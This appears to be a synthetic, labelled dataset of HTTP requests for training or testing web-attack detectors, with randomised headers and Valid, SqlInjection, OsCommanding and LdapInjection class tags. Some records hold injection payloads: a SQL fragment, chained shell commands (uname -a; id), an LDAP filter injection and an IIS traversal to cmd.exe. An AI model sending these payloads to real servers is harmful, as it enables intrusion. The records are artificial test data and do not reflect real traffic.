Warning: 728 www.6meT.htm "tbadlt3aeEaT" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 408744625517883
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39819
Start - Id: 8628
class: Valid
GET /aRFlGM8Qu/itieTla/keJmIkFR/EaaetRnlde/fGK_execJlikeovarDftpfiK/3jCOC_XZ/oPJeLUC/mC.tiff?aohtf=-&naioxaamtdntpsb=nbKpetpcnSths8oiui&5i2ecwokecejcha=nszc9&ipietatqrh=t HTTP/1.0
Host: www.scilca.st
Connection: emLitsl
Accept: */*;q=0.7
Accept-Charset: windows-1251;q=0.9, x-mac-japanese;q=0.4, x-mac-roman;q=0.1, x-mac-chinesetrad, x-mac-japanese;q=0.5
Accept-Encoding: *
Accept-Language: eitapein-ra, kreof-mtcUf
Cache-Control: no-store
Client-ip: 216.129.18.48
Cookie: rpEct=1e winnta
Cookie2: $Version="262"
Date: Sun, 26 Apr 09 20:13:41 CET
ETag: W/"sRTXVWBlWEuHjcEL"
Expect: 100-continue
From: ateut5@tfeeh.uk
If-Modified-Since: Thu, 12 Feb 04 09:07:07 GMT
If-Unmodified-Since: Thu, 16 Dec 04 08:31:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Jun 05 14:33:40 CET
Max-Forwards: 486
MIME-Version: 0.9
Pragma: enLdG=bpe
Proxy-Authorization: Digest response="51d1e171acafe5D1aaf5EF4b7BD78eDA"
Authorization: nmfqaa leole32n=a5whi
Range: 1-,565-51430,79330-
Referer: /thn3msl/jrBst/hpregfd.php4
TE: trailers
Trailer: Host
User-Agent: oFippjGBAx http://www.0ott.de
UA-CPU: 68000
UA-Disp: 5087,858,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5756x292
Via: d7b/4.6 www.cniact.shtml
Transfer-Encoding: leyyf; eFaefu=eode6eh8
Upgrade: oAk/9.7, ylzLli/0.8, hne/4.9
Warning: 978 www.7otT.css "fraauadw2rek0lel5" "Sun, 20 Jul 08 18:39:31 CET"
X-Forwarded-For: 240.127.253.85
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8628
Start - Id: 24409
class: Valid
GET /hmt6s/tXHwr_X28uY-/Tzh0o11edlI9/eBd-UnhbOBKe/oWapUXZ6W5mr/a-mdZFX34Q3/hP/bl7B1YU/rsE/lre.jpg?dz=feNvi9bx6r&tett=os%3Efe&urto=%3Er6o HTTP/1.1
Host: 109.23.214.3:5
Connection: keep-alive
Accept: image/*;q=0.1, application/zip;q=0.3, audio/*;q=0.3
Accept-Charset: iso-8859-6, x-mac-hebrew;q=0.3, iso-8859-6;q=0.2, x-mac-japanese;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=19157
Client-ip: 143.96.218.124
Cookie: 22kbpO4xW=t$qy;@7stdinUFFHIf@=mlE\t;a(alcmdherinoess;atr=004307512
Cookie2: $Version="1"
Date: Wed, 21 Apr 04 16:31:45 UTC
ETag: "N@4OzedUd4oxnDih"
Expect: 100-continue
From: atsi5Uu@uejlY.com
If-Modified-Since: Tue, 14 Apr 09 03:06:21 CET
If-Unmodified-Since: Mon, 17 Sep 07 04:54:07 GMT
If-Match: *
If-None-Match: "D5D37zTWyocNUu9CW"
If-Range: Sun, 04 Sep 05 05:40:30 CET
Max-Forwards: 850
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest response="03f5CBdFe1b3b7aFaCeAB191f27Fe5e8"
Authorization: t6eegr svoi8qno=lew1nmn
Range: 61288-04731,214-935
Referer: /2bsf/coI7uf/Zbegev/snfnaels.cfm
TE: deflate,gzip
Trailer: Host
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 4.9; cz-wo; rv:1.1.1) Gecko/75248955
UA-CPU: StrongARM
UA-Disp: 801,8735,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1274x3966
Via: trwEt/5.0 www.diio2.shtml:12401
Transfer-Encoding: c1rl
Upgrade: bf6/1.0, t7Oteo/2.2, sdo/9.0, olyo2o/7.4, ivryva/4.0
Warning: 402 www.8iitaqp.shtml "eenh8nejpamwsHv" "Wed, 04 May 05 21:54:36 GMT"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 568060558126
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 24409
Start - Id: 11734
class: Valid
GET /o9bwiiaedw3whswTixoa/oAZpp7/54nOow8lxstD0/7bJe0CM5er/e@/lai2mwtatnieow3dadE/Li2O4vizyGtat/e5V7hF/1vMRAT1DROvcxhAMxiw-.html?esvagxx6sc7O=%7Ci0dn%3Bsao+hIetstdinein+n&iTe=ooa6t&af=e&9VZa7wBQvf=ef1ar9sdazoiawTl&nrtinoJoy=66&netdrwo3jnrhaco=654966 HTTP/1.1
Host: www.ii8dulnusl.net
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-7;q=0.2, windows-874;q=0.5, big5
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 94.129.93.132
Cookie: awam8ttiwT0ta=a0rk7u g
Cookie2: $Version="6"
Date: Sun, 04 Apr 10 01:39:58 GMT
ETag: W/"8ow-w-ox7z0eIG1XlR1"
Expect: 100-continue
From: lAuala@v9ti4o.be
If-Modified-Since: Wed, 22 Jul 09 04:53:05 GMT
If-Unmodified-Since: Wed, 02 Apr 08 07:15:18 UTC
If-Match: "OVrU9lXLBurf@k0."
If-None-Match: *
If-Range: Fri, 28 Jul 06 07:38:04 GMT
Max-Forwards: 3633
MIME-Version: 4.3
Pragma: ttetpcea='n4tdc'
Proxy-Authorization: Digest response="aC035b73FACF986E93e1E771dF14eF2b"
Authorization: NTLM WXJhdXJhdGlkbWVzblNpaXJyYnNvaWNyaG95ZXJyNmUz
Range: 1-,5-,24371-73606
Referer: http://svhv.cz/seinN/0nArt/dmktfce.swf
TE: trailers,chunked;q=0.6,trailers
Trailer: Accept-Language
User-Agent: gbQua.l http://www.trnk.it
UA-CPU: x86
UA-Disp: 1077,6498,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0846x910
Via: 6.9 1.108.222.8:2, 2.2 www.8moNgv.png:8148, 2.2 www.ptaipg.png
Transfer-Encoding: deflate
Upgrade: ev2/2.0
Warning: 663 www.ynai9.tiff "n7t2mdsRiashos" "Fri, 19 Jun 09 23:55:59 UTC"
X-Forwarded-For: 173.221.98.4
X-Serial-Number: 68893779
----: -------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11734
Start - Id: 21026
class: Valid
GET /JQREwget/rhtrdsdJdh90T6Lsiiy/uwameqaqa/odiHdFL-8/hE1Ccbssnvz.mdb?kcrrcf=ule%28%5B%2FeSOia+&sorbMgihn=iatbivmohhec&eyxi=141540&iJeGBa3nw=edsAo&islxnmih3eu=nit&goikfeiIgntlt=55&rAneS5ee=ocVlayetikieyseu9u&6eprbohhc=loggiiael%7Ed&oh=egroup+by%2Fsehomeora%5City+sa%26re&pRbx=+f&5TCksTWEmKSx=72 HTTP/1.0
Host: www.0oMaItL.org
Connection: arnMw
Accept: text/*, text/html, video/*;q=0.1
Accept-Charset: x-mac-korean;q=0.4, iso-8859-8-i, windows-1255;q=0.6, iso-10646-ucs-2;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: tgficns=cuiaeb
Client-ip: 207.254.64.132
Cookie: soarail=c;tnmochan%tY;LdegmeItnueose6=oYaa;nfer0=5473
Cookie2: $Version="2"
Date: Thu, 05 Feb 04 18:22:38 UTC
ETag: "tSIF4JdVwqhwBsi"
Expect: Lhiasd=bwo4owa
From: hrtiet@tsotaco.it
If-Modified-Since: Tue, 04 Nov 08 10:16:21 CET
If-Unmodified-Since: Wed, 10 Mar 04 14:27:18 GMT
If-Match: "SgftQwnpIuULytDCL7B"
If-None-Match: *
If-Range: "3lpujoQYfRnaZ.teJ9k"
Max-Forwards: 90
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: Digest response="3effb2E63EAEf9B3D490d5bd9dae4a94"
Range: 729-89313,-42549,64779-835298
Referer: http://atypiKcm.gov/rwMteo/tbx81mws/pbserhR/iIeol.tiff
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.1 (Machintosh; U; PPC 1.1; kx-ni; rv:0.8.2) Gecko/49060940
UA-CPU: 68000
UA-Disp: 1375,066,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 985x390
Via: 4wtle7/9.4 214.142.10.111
Transfer-Encoding: identity
Upgrade: stlms2/7.1
Warning: 107 www.9irolwh.htm "6dC3ha2n" 
X-Forwarded-For: 155.13.62.32
X-Serial-Number: 650978480578430420
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 21026
Start - Id: 29206
class: Valid
GET /vjAYMOVWl/nt0tyt/qorU5yida5gtsejt6rEo.htm?teet=ts4OZvG.0f&oe9HmmToin3aeeT=slwkaZrKrK&iioedc1adoes=bE%25+n+oxteessystema%29dV HTTP/1.1
Host: www.ayhue2cr.net:18663
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-hebrew;q=0.9, koi8;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 7.74.8.47
Cookie: zanlrOeeao=\opt0;phii0rtrtizht=b@g34a;yUupdateYdxtermcwhereOwlsn=|tfa];r8Syuha=passthrufopene
Cookie2: $Version="3"
Date: Tue, 12 May 09 19:55:04 CET
ETag: W/"IT3Oc@MPJr_5lmTpiRXG"
Expect: 100-continue
From: 4otngeu@itoo.net
If-Modified-Since: Fri, 17 Nov 06 09:19:40 GMT
If-Unmodified-Since: Fri, 17 Aug 07 23:01:21 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 28 Jan 05 14:36:47 CET
Max-Forwards: 8
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9pM0NkaXNybmxlYXNuYXR4ZXJmeWFqeXNzY3g3bmVBbnFucHRlc2VvaWVB
Authorization: Basic ZWExTWdvOmhidW9yMg==
Range: -4
Referer: /dleaZn/vedi/twaivn/aOdzo.fgf
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: iv0_TtP http://www.glUsh.biz
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 887x0016
Via: FTP/4.2 www.tnnomO.html, 9.6 www.o8nam.jpeg
Transfer-Encoding: deflate
Upgrade: itc/2.5
Warning: 465 31.104.70.47 "aHtsasee" "Thu, 13 Jul 06 17:16:25 CET"
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 4041973045614
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29206
Start - Id: 1598
class: Valid
GET /nAGqHN0PhGgIlJxsA34e/igO6dPe/lDjhTGX17NeR/siLvssM/XdJsK/gcim/o8/nfpfxat/oFQRNVZIT.1orE/tta/lxsHtHaeheu/gSvTzZrQuq0.js?fpwiqrd=xbbu%40O_o8IS6&yt9link9Sng=157162234&thaecnel9=tteansjmh&ylferydxtcrsnf=dv2L_Wrc8bz.&nlrHee=10545&_SJ5A=emave9ep&jeihce7criTUp=5874404&ihbrt=fRA%40wMHLuu&9AlZ4-=r&replacetUmyD7l2m=erb+-mocharTw%28tdeoii&7Sp7=3 HTTP/1.0
Host: www.ta9agantde.st
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.7
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 117.148.138.175
Cookie: ZoHk8YZd=90898;xnetcat_p-OT-q=54183;lree3ellis=r3CsJ
Cookie2: $Version="4"
Date: Wed, 02 Feb 05 14:10:48 UTC
ETag: "knTGSe5R4krTx1@Te0aN"
Expect: 100-continue
From: AiEharoe@esac.fr
If-Modified-Since: Sat, 23 Dec 06 23:21:06 GMT
If-Unmodified-Since: Mon, 14 Jul 08 06:43:09 CET
If-Match: "qPo6Rp_HD8LbNiB2"
If-None-Match: "nVANHx8Lq-Oa1MXc7NU"
If-Range: "694ZrWm1lEMPlugo"
Max-Forwards: 9327
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic cmlvNm5zOnJ0cHI=
Authorization: NTLM OWFvbmhlbnJsNWx0Y2FudHJ4c2EzZWFpZXVub2gzbmR6VzY0
Range: 3-44786
Referer: /edhnhwhn/nBna/akoffl/1LnLua.shtml
TE: trailers
Trailer: Expect
User-Agent: NtOcthei (ppDpFwx7i; t5dhPr; s07Dnvdg@y; 2kGYdP)
UA-CPU: x86
UA-Disp: 1710,881,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7934x8697
Via: anr/0.9 135.71.121.175, 3.0 www.oyOd.htm:8730, 9.9 57.154.137.244:1792
Transfer-Encoding: gzip
Upgrade: 5cl/5.1
Warning: 673 72.154.61.36 "gnhtlcs" "Wed, 10 May 06 10:46:29 UTC"
X-Forwarded-For: 240.238.253.4
X-Serial-Number: 29285068
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1598
Start - Id: 41440
class: SqlInjection
PUT /rrthToxtgu8StbrsE/ntaNieejtttbspw/gNIzfn9e1yboeoimhc.pl? HTTP/1.1
Content-Length: 315
Content-Language: skbo,rwmsoi,an
Content-Encoding: deflate
Content-Location: /9Iat0/gnsufteS/8trn/16svAcna/ozlde.swf
Content-MD5: dGxuNm9vaTExc21zaWVGZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Sep 04 16:50:17 CET
Last-Modified: Tue, 19 Oct 04 16:05:49 CET
Host: www.isn4b1s.ch
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 170.255.57.155
Cookie: ib7==eH2noshH;htsTeouyE=it5;irOpaTgiy6fdso9=boot.inirsOrne3;wetceiaiebos=9521
Cookie2: $Version="41"
Date: Wed, 17 Oct 07 24:44:54 UTC
ETag: "leLIR_bfgo22sOQ"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: "LksjpT9Vqso3VodlRT"
If-None-Match: "fC_FxN4kEMgnWxAyW925"
If-Range: ".lXwLS1Jjq6vq.LA56g"
Max-Forwards: 5
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: pqonb enmhpnom=fenruoo7
Range: -86
Referer: /theo.wmn
TE: deflate;q=0.2
Trailer: Date
User-Agent: Mozilla/7.9 (X11; U; Open BSD i386 6.8; Ix-Ai; rv:7.5.3) Gecko/04561565
UA-CPU: MIPS
UA-Disp: 5047,1180,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x118
Via: HTTP/4.8 14.7.10.11, 5.6 76.230.3.218, lka/0.4 www.ye7aetr.gif
Transfer-Encoding: deflate
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 243.251.179.229
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

isvnaeeusaby=lformKreplacex6gi0 &da7swticddte=6753&srtReoittbYtesn=256179&zrn9sf19yq=nurseesg&e98orvOo=053830&hlcsaAR=oaccepthaue&Ngottabgdoexarg=' AND USER_NAME()='eaun&ah11nahonl=9Dree6h&carhaicmuirWa2=>t>h&txdhllrE=mxjat&sasg3=m@V&amW5nanephdm=7xoi&ehm2dhhgahaxeer=sojkouQAtslh5&htsc=b&zRgcsF=761

End - Id: 41440
Start - Id: 43342
class: OsCommanding
GET /mjJQsHcBJ@mOXjW-t/YN/thhaiega3airsn/i4jTG5vO/aitrntiHnnejAorHa/N9Seg8RservicesA-/2teldt6hniSvkd/v2QphpiOoMyh/toogFnaco1eeetuae1/EYPM_Qve_aposition/eYktDXdBE.php3?gdeecatehdmd3c=adminh&replacepNpe=%27tt&decxiaeanq9ldw=++%3B+++++echo+++++++%3B++++w++++++++++%3B++uname+-a++%3B++id&atqtfc1lH5=ftPHRerntme&lnnEtod5aofv=divrigsvrGdusrbgsoundgroup+byinsertoxml%3Ao&5inzeb=e4Pe7weSoh&mhmotsaeeIimnmh=3070&eScd5gh=1CcjD&oagexw=havingxexecrxp_hioS6ytM&Emealtow=84133149&djriyeap=nvnmer1e&sydji3wniro=iekS6&lx0ts=ftuye HTTP/1.0
Host: www.uerpia.biz
Connection: close
Accept: */*;q=0.5
Accept-Charset: us-ascii;q=0.7, x-mac-cyrillic;q=0.3, euc-jp;q=0.1, ks_c_5601-1987;q=0.0
Accept-Encoding: identity;q=0.9
Accept-Language: Ucwold-BhnI1t9i, red-nnD, tu-zew;q=0.9, dzaet-el, 4Srbib-dg
Cache-Control: only-if-cached
Client-ip: 39.142.10.38
Cookie: fe=84109413;ihuena2i=0659125
Cookie2: $Version="732"
Date: Thu, 10 Jul 08 03:00:21 UTC
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Tue, 02 Feb 10 11:14:53 GMT
If-Unmodified-Since: Sat, 12 Feb 05 03:01:04 GMT
If-Match: "HJ5J1nlZ9dk_1cYV"
If-None-Match: "_clmkQ9TIrz0pU6"
If-Range: "vCmxuZTe68mBfpLsJHb"
Max-Forwards: 0144
MIME-Version: 0.2
Pragma: bs='oeUob'
Proxy-Authorization: Digest nc=0dbF188e
Authorization: desngn piBmna=tHse
Range: -3
Referer: /enpt/gprui/eqEehs/eesl/ygfr.php3
TE: trailers,trailers
Trailer: From
User-Agent: 0Q4QiEoI http://www.tesoa.uk
UA-CPU: 68000
UA-Disp: 061,373,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 331x628
Via: nqeof/1.9 72.193.110.189:3, FTP/2.1 www.whqo.gif, 2.0 www.amtir5.html
Transfer-Encoding: gzip
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 673 www.eotg.jpeg "ttFtvipf" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43342
Start - Id: 38813
class: LdapInjection
GET /eE1/tbao70noniiranetrte/cat6/2dQ/s@9u/eo9p/tIroou/neu4ieen9mioe/yBR1likeU7fevalJ/eWdcA0/idGN-TD.@vFQH9ltFGv/strS.htm?ideeecDbrieat=%29+%28++%7C++%28+cn%3D*o+++%27brien*++++%29%28mail+++%3D*o+++%27brien*+++%29&fl8bu=ss2ooyy&TNpgM=sF&pasSeIscm=10&mux3positionjlikeS7=6922282&hdceaU4=622576 HTTP/1.0
Host: 206.103.8.194:58
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, x-mac-hebrew;q=0.1, iso-2022-jp;q=0.0, macintosh;q=0.4, koi8;q=0.9
Accept-Encoding: identity, identity;q=0.4
Accept-Language: E5-xCDvf;q=0.8
Cache-Control: tLrsnoes=oAelbrig
Client-ip: 103.147.207.153
Cookie: mtcmRaaoei=068;usvtndigr2ehmLo=enggrmr3didmz;pD=74870294;542Ucusr=wtnoi5etzgi7;feygo=991661
Cookie2: $Version="420"
Date: Tue, 06 Apr 04 17:19:32 UTC
ETag: W/"XO.R8JWcEWuUM9wv"
Expect: stgenha=alean
From: Emhleev@7nsic.de
If-Modified-Since: Thu, 15 Nov 07 10:00:42 UTC
If-Unmodified-Since: Mon, 29 Mar 10 23:43:42 UTC
If-Match: "BBzvbA@EGFRS6a983x7"
If-None-Match: "PqKU5EONLnOiD4d"
If-Range: Sun, 17 Aug 08 14:03:29 GMT
Max-Forwards: 75
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: NTLM bWgxaWNpbXFuYWFkbXRvbHRoZU9uaVNqbGlyZWhFbmV0Y3hsb2V0dGlZMnh1
Range: 635-4999,578-28594,-3
Referer: /eetetred/ekhaAm0/e2eaiO/Fisbte/3eaor4s7.cfm
TE: trailers,deflate,trailers
Trailer: Pragma
User-Agent: rlTrai/2.2.7
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 6.4 www.aaiarxez.png:8, HTTP/9.9 www.s2pli.png, 7.3 200.115.93.220:755
Transfer-Encoding: deflate
Upgrade: nnttd/5.1, egt/5.4, hhil/2.6, yoxamn/4.2, errtdt/4.7
Warning: 023 39.150.229.95 "eattAsOfe" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38813
Start - Id: 33852
class: Valid
PUT /4PxF3jIGcfJSl/Gpassthrun68fN/mD/mptut0eayokb5999e/ederleTHtaettfrmnnys/jI53isnntiah5as/@qXpvwT82/4_-4tg31WLr_TymZaN/nk/alrcoWnunf0At/poapdert16tSersua/nhtsbftme.js? HTTP/1.1
Content-Length: 214
Content-Language: ephxb,ataeip,dhssue
Content-Encoding: identity
Content-Location: /orde/rTAeI/bolEydwt.jpg
Content-MD5: cGVzenRuNHV0MG54Y3N1cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Mar 08 17:35:43 CET
Last-Modified: Sun, 29 Nov 09 17:07:19 GMT
Host: 36.161.187.179
Connection: sve9t
Accept: audio/*;q=0.8, audio/basic, text/*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: identity
Accept-Language: n-Fthttu, nWrNoe9-gis;q=0.9
Cache-Control: no-transform
Client-ip: 97.44.87.46
Cookie: cieccmokwfs=hidR)asnt'btEoDiAec
Cookie2: $Version="264"
Date: Mon, 20 Nov 06 07:12:31 CET
ETag: W/"COp0UgeCb27E23yDy"
Expect: iIe36c
From: enboxjc@lhss8.de
If-Modified-Since: Sun, 27 Feb 05 24:53:46 GMT
If-Unmodified-Since: Tue, 04 Aug 09 05:53:20 UTC
If-Match: "KxqlW5kjyJedu52"
If-None-Match: "Bvu4t70EDRUes4bVrvre"
If-Range: "0e@eJvI6nl.J9_TV99CY"
Max-Forwards: 20
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: oah9b mhttew=i9iaru1
Authorization: Digest algorithm=MD5
Range: 924-,26125-3,137-09356
Referer: http://www.qUad.biz/5aehlAti/2IE6ol/htIglst/cedr.swf
TE: deflate;q=0.4,chunked;q=0.1
Trailer: If-Range
User-Agent: Mozilla/5.9 (Windows; U; Win 9x 7.7; me-te; rv:2.0.1) Gecko/58828124
UA-CPU: 68000
UA-Disp: 3260,0446,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1982x002
Via: 6.3 4.201.60.200, lij/9.2 www.5rll.shtml
Transfer-Encoding: gzip
Upgrade: EI2/3.9
Warning: 343 www.suiglbE.html "pthnTtNjlbncxd" "Fri, 09 Sep 05 11:27:25 CET"
X-Forwarded-For: 36.38.198.62
X-Serial-Number: 562812126143349
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Dobject0cat6VFV1T=7890&od=882541&s8GnneneAoxAe=lpnEINiCuriewLtsx&AUydeleteBi9Lc1up=a7yhaonu3ex&oEilslyel=bTNIie&ca4nbvtuete=tsA&mersamor=t9tfperle7&ekipaheooriioi=0&ThT2nA=0rcfart-smfrusretmp&WncV@@F_2=4&9rit=O um2

End - Id: 33852
Start - Id: 16146
class: Valid
GET /PLYE-4KJDEr_brD/dPO3ls3Md/8_xrhc8AImtUjFSWlf@/Uibpy@MNNQ0l4I/sTthdensfioogs.cgi?nmpghtsyeRso=nssa&aIk8earpeMnei=pMa7p&sl4lQxsona=e4qdzTTUON&oGimuiEstnitpd=camc%3Caiu%25e9%3C4wm&fad=tejwtwafuiuiL6am&reoieaFa=uaaUr HTTP/1.0
Host: 222.84.106.40:7
Connection: keep-alive
Accept: video/*;q=0.4, audio/*;q=0.2
Accept-Charset: x-mac-turkish;q=0.4
Accept-Encoding: *
Accept-Language: amthgri9-SdstoEoe;q=0.9, 9hvl7liq-getl;q=0.8
Cache-Control: only-if-cached
Client-ip: 96.42.174.1
Cookie: a0=vh;pEzLyulh=i.6G3ETS5;2otterhphl=gxp_@/r
Cookie2: $Version="550"
Date: Fri, 31 Aug 07 24:58:55 CET
ETag: "3iRE3fWh@ptKEGRS-Qbf"
Expect: 100-continue
From: nt6y@jrn3wp.st
If-Modified-Since: Sun, 18 Mar 07 17:47:50 UTC
If-Unmodified-Since: Sun, 06 Jan 08 15:23:27 GMT
If-Match: "pF1rsP3C-ou-eNacvQ"
If-None-Match: *
If-Range: *
Max-Forwards: 11
MIME-Version: 9.3
Pragma: 5tr=ne
Proxy-Authorization: Digest opaque="PcngeE"
Authorization: ght6 lmtligi=tthoddx
Range: 396-,06-480,6-
Referer: /oewaet.shtml
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/5.3 (compatible; Konqueror/7.1; Open BSD i586; 8iaeh8re; smlrb)
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 846x8936
Via: HTTP/5.0 49.180.186.178, 9.5 www.torzma.htm, HTTP/9.5 www.et8esD.js
Transfer-Encoding: identity
Upgrade: c7s/6.3, sdds/1.7, hGed/6.3, sda/9.3
Warning: 819 www.htahn.html "47kuswi" "Thu, 19 May 05 07:26:39 UTC"
X-Forwarded-For: 162.250.140.40
X-Serial-Number: 272424729108053
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 16146
Start - Id: 44232
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.pb9lw.ch
Connection: close
Accept: application/rtf, application/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="760"
Date: Tue, 06 Sep 05 04:19:06 GMT
ETag: W/"ZSz6CGXGK.XnFvDbA3Ds"
Expect: aoaigdm=rnakey;sl6yntc=sonie
From: ided@udhoes.uk
If-Modified-Since: Sat, 06 Feb 10 14:14:44 GMT
If-Unmodified-Since: Fri, 23 Dec 05 16:31:24 CET
If-Match: "JD8vHCvu6cR4qPeuu"
If-None-Match: "vmSzjvsbfVWl4hr"
If-Range: "KYZOOKQ2z4Kot3kdi"
Max-Forwards: 199
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: todoif 86auyni=mfqem
Range: 0-3876
Referer: http://www.ixin.ch/phTrctod/ameeycn/e4iu.cfm
TE: gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: tdrsbntdissSeIG
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: 0.5 www.hyu3Psy.html, HTTP/1.8 www.ro777ewr.css
Transfer-Encoding: hyjlh8; h88og=mtjiTugS
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 551 60.137.215.80:7814 "tgrsetastm" "Mon, 04 Feb 08 20:28:14 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44232
Start - Id: 29247
class: Valid
GET /y@tKa/eAhDhp/ogdl9snvmteDEtj8eVPw/betweenAbunionzww/ofWNM/fBGGvJRu2.4xp_BBadmin/isethnshhaedrb5aiowA/bqRIAj.mdb?xGyWW=etCjmXCs2i&bi=edou&vlht=OykelT&rr=atpa&miIonzD=96818&anuhoa2twReI=t%24ocnetcatiodenyow&IreplaceBW.EYHq=56247&okShSOnilwrh5o=nj1cpiaoe&iytr=97761&Nhasra76eeEr6tH=va68i%5Coe0f&etthatetJe6=iorox+llOr2taefO&8utiWaor=%274&nbhAIodittom=osfnphmi&2u=dwtgSane4&in3Ciqeo3nkwkiy=15026 HTTP/1.0
Host: 73.204.18.187
Connection: eoaentf
Accept: text/*;q=0.2, text/*;q=0.4
Accept-Charset: ks_c_5601-1987, iso-8859-6;q=0.0, iso-8859-1, windows-1252;q=0.7
Accept-Encoding: 
Accept-Language: rThont-g, zraie-Ophos;q=0.1
Cache-Control: no-store
Client-ip: 56.250.51.147
Cookie: 3cBeIsdhem=858782;haheeo1mrso=iOH;asoieaa9niphev=iksdTJK_KXT;anull3g=51;ioqd=positionqi~s@A;dspi5anliz6e=m+ro-iotehtn
Cookie2: $Version="55"
Date: Thu, 13 Jan 05 19:28:56 CET
ETag: W/"dBlK_bBo7IbV@EY"
Expect: 100-continue
From: tnshFaon@heiy5nOc.fr
If-Modified-Since: Mon, 10 Jan 05 06:52:47 CET
If-Unmodified-Since: Fri, 16 Sep 05 15:31:42 UTC
If-Match: "QMpEKVXZURH0WtWvqa-4"
If-None-Match: "FQ3Lveybs99u3VGLLOxy"
